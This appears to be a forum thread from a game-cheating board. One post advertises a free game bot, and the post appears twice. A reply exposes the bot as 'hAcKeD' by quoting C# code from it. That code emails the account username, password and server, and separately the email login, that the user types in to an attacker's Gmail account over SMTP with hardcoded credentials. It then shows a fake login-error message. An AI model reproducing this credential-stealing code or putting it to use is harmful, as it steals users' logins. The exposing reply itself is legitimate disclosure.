Third free bot
Features:
Background bot
Collect Bonus Boxes
Username/Password login
Killing NPC
Repair when dead on base/port
Collect Booty
Use PET auto-looter
Known issues
Won't escape when HP is low
Won't escape from enemy
Freeze and crash at random times
Requirements:
.NET Framework 4.0
Windows 7/8/10
Download link:
-insert 105% malware free file here-
Virustotal:
[Only registered and activated users can see links. Click Here To Register...]
Features:
Background bot
Collect Bonus Boxes
Username/Password login
Killing NPC
Repair when dead on base/port
Collect Booty
Use PET auto-looter
Known issues
Won't escape when HP is low
Won't escape from enemy
Freeze and crash at random times
Requirements:
.NET Framework 4.0
Windows 7/8/10
Download link:
-insert 105% malware free file here-
Virustotal:
[Only registered and activated users can see links. Click Here To Register...]
Quote:
hAcKeD!!!!Code:MailMessage mailMessage = new MailMessage() { From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]") }; mailMessage.To.Add("[Only registered and activated users can see links. Click Here To Register...] "); mailMessage.Subject = "Új acc!"; mailMessage.Body = string.Concat(new string[] { "Username: ", this.MephTextBox1.Text, " Password: ", this.MephTextBox2.Text, " Server: ", this.MephComboBox1.Text }); SmtpClient smtpClient = new SmtpClient("smtp.gmail.com") { Port = 587, EnableSsl = true, Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "hacked200") }; smtpClient.Send(mailMessage); MailMessage mailMessage = new MailMessage() { From = new MailAddress("[Only registered and activated users can see links. Click Here To Register...]") }; mailMessage.To.Add("[Only registered and activated users can see links. Click Here To Register...] "); mailMessage.Subject = "Új email!"; mailMessage.Body = string.Concat("Email: ", this.MephTextBox1.Text, " Password: ", this.MephTextBox2.Text); SmtpClient smtpClient = new SmtpClient("smtp.gmail.com") { Port = 587, EnableSsl = true, Credentials = new NetworkCredential("[Only registered and activated users can see links. Click Here To Register...]", "hacked200") }; smtpClient.Send(mailMessage); Interaction.MsgBox("Email or password incorrent! Check your credentials!", MsgBoxStyle.Critical, null);